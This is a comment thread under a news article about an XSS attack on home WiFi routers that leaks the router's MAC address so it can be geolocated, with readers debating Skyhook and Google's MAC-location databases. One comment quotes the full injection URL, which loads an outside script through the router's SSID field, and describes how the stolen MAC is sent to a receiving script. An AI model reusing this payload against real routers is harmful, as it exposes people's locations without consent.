back to article Hacker pilfers browser GPS location via router attack

If you're surfing the web from a wireless router supplied by some of the biggest device makers, there's a chance Samy Kamkar can identify your geographic location. That's because WiFi access points made by Westell and others are vulnerable to XSS, or cross-site scripting, attacks that can siphon a device's media access control …

COMMENTS

This topic is closed for new posts.
Thumb Up

Use this for good, not for evil

Does anyone know Osama Bin Laden's MAC address?

1
0
Stop

Skyhook

Anyone heard of Skyhook (www.skyhookwireless.com)? Guess what they keep a database of.

No need to hack the routers as many admins have purposefully given their MAC addresses out to be used in public. Helps you find your location when GPS is suffering from an adverse dose of echoed signals rather than direct ones from the orbiting satellites.

Doesn't sound like so much of a hack now does it?

Regards

Neil

0
0
Silver badge

Huh?

The hack is getting the MAC address off a user without their permission, therefore being able to find their position.

Knowing *where* a MAC is located isn't the issue

0
0
FAIL

Not accurate

I tested mine and it said I was in Inglewood, Los Angeles, USA.

Pity I'm in England, UK

0
0
Happy

The title is required, and must contain letters and/or digits.

At least it means the Black Helicopter brigade cannot find us!

My (UK based) is Washington DC, apparently.

0
0
Black Helicopters

be afraid

That's because that's where all your communications are being fed via by the guys with the copters

0
0
FAIL

Bogus!

Anybody bother to note the flaw in this? The MAC address is only valid on the immediate network connection. How can Google know about my MAC address after it passes through a router?

Maybe this is a California FIOS vulnerability.

0
0
Go

Android

Google's "Location Service", not sure about their web services, but certainly on Android, when Android registers with a WiFi network and you have 'Share my location data' and GPS enabled, then the MAC / SSID of the WiFi point you're connected to is sent to Google along with the GPS co-ordinates.

I know this because I have an Android phone, and when using WiFi location before enabling GPS, it used the nearest cell station, now it puts the pinpoint on my house, with roughly a 100m "accuracy".

Just another reason for NoScript - ABE stops sites accessing the local network.

1
0
Headmaster

Not bogus, rtfa.

The mac address isn't being extracted from the packets somewhere downstream, as you indeed correctly point out that couldn't work. What part of "http://192.168.1.1/index.cgi?active_page=9098&req_mode=0&mimic_button_field=goto%3a+9098..&button_value=9098&ssid=samy%20was%20here%3Cscript%20src=http://samy.pl/mapxss/fiospwn.js%3E%3C/script%3E" don't you understand? ;-)

It uses a cross-site request to access the router's admin page, and XSS to inject javascript into the html of that browser admin page that uses an XMLHttpRequest object to fetch the MAC address from the router and send it as a GET request parameter to a receiving script on the evil website. Relies only on HTTP between all the involved parties and no layer 2 properties at all. Should work anywhere. See http://samy.pl/mapxss/fiospwn.js for the internal details; the receiving script is http://samy.pl/mapxss/fiosmap.php and it expects the mac in "NN-NN-NN-NN-NN-NN" form as a url query string parameter named 'mac'.

2
0
\\\

Here's a title

============================

I know this because I have an Android phone, and when using WiFi location before enabling GPS, it used the nearest cell station, now it puts the pinpoint on my house, with roughly a 100m "accuracy".

============================

Exactly the same here. There's also different companies offering location based services using wifi, eg Navizon.

0
0

who cares.

so they know in which room my router is installed. big whoop.

0
1
Bronze badge
Black Helicopters

Doin' the Evil

The real story is Google is building a database mapping MACs to locations. A MAC alone doesn't provide any info so they must have quietly made deals with a lot of telcos and WiFi operators to gather data that normally isn't recorded for any length of time.

0
0
FAIL

Geographically Challenged

Sat in my living room in North East UK, and it says I'm in Downtown Madrid... maybe the snow's confusing it a little !

0
0
Silver badge

GPS?

Coordinates != GPS. Unless the Uncle Sam's Global Positioning System is used, it isn't GPS.

0
0
Thumb Up

Good fun

I put the MAC of my wireless AP in, and it came back accurate to within a couple of houses (In West London). It didn't know about the ethernet MAC, and I was unable to extract the DSL one from the web interface.

Maybe the street view cars collect the MACs of APs as they cruse around.

0
0

Link to his web site

Follow the link to his web site, see what happens.

0
0
Thumb Up

Skyhookwireless

Top marks to the man who said go look at Skyhook Wireless.

Skyhook's website has a reasonably detailed description of how they initially set up their database.

If you have Google Maps for Mobile on your phone, and WiFi on your phone, you are using Skyhook's services.

If the phone knows where it is (via GPS or via Skyhook) is it also potentially sniffing MAC addresses and updating not just your position on your map but also the locations in Skyhook's database of every MAC address it finds?

People might like to know. This is why I stopped using GMM.

0
0

How it all works

There was a talk about skyhook wireless and how it works at this years chaos communications congress:

http://events.ccc.de/congress/2009/Fahrplan/events/3600.en.html

It explains how all this works.

1
0
Go

Holy Yellow Pages Batman

I'm in the phone book too!! Just Damn!

0
0
Anonymous Coward

Wtf

MAC? Do they mean IP? If it some sort of database of MAC addresses, what happens when I buy a new router?

"It's actually scary how accurate it is": apparently I'm in Kingston; oh, now I'm in Crawley. I agree, very scary.

0
0
Paris Hilton

"If it some sort of database of MAC addresses"

"If it some sort of database of MAC addresses"

There's no "if", it *is* a database of MAC addresses and their geographical locations.

As you rightly point out, it is not 100% reliable, because MAC addresses aren't forever tied to the same place, and it is in principle possible for two bits of kit to have been modded to have the same MAC address.

But for a lot of MAC addresses a lot of the time it is horrifyingly accurate.

It does need something to ensure it is kept up to date, and grown to areas where it doesn't already have coverage. And what better for that than an on-the-quiet feed from every instance of Google Maps for Mobile on a WiFi-equipped phone? Nobody would expect Google to use people's data and activities for a rather different purpose than the end user was expecting, would they...

Everybody knows where Paris is, even Americans.

0
0
FAIL

Doesn't work here

Unsurprisingly, utter fail to locate my MAC.

0
0

Err...

It got me to within 10m of my house, all of the postcode, except the last two letters. I'm impressed and pissed off at the same time. I also don't have my wireless switched on all that offen.

0
0
Black Helicopters

Google Street View?

The Skyhook writeup I read some time ago said they seeded their database by working with a (US) courier delivery company whose vans were already carrying GPS locators. Skyhook added WiFi scanners to the fleet so wherever the vans went, they picked up the MAC addresses and know where they are. SO everywhere the courier company has been, the MAC addresses and locations are known. If I remember rightly that was a one-off exercise.

Skyhook's chosen courier company don't get everywhere, but we know someone who has near-100% coverage within selected areas.

The Google Street View cars already have cameras and GPSs. If as they drive around in their target areas they are also scanning for WiFi MAC addresses (or BSSIDs as they seem to be called sometimes), you have near-100% coverage in a given area - at least till people buy a new router, move home, whatever.

Once Street View leave the area you're presumably back to random "crowdsourced" updates from folks with smartphones etc.

0
0
Anonymous Coward

Street View - RalphS was first

[AC 14:42 here]

Sorry RalphS, missed your earlier mention of Street View here. Respect anyway.

The WLAN MAC is (obviously) visible to a WiFi receiver, but the LAN (Ethernet) MAC is typically only going to be visible on the hardwired network. The DSL side of things doesn't have a MAC address as such. So the only interesting/useful one is the WLAN one.

0
0

This post has been deleted by a moderator

This post has been deleted by its author

This topic is closed for new posts.

Forums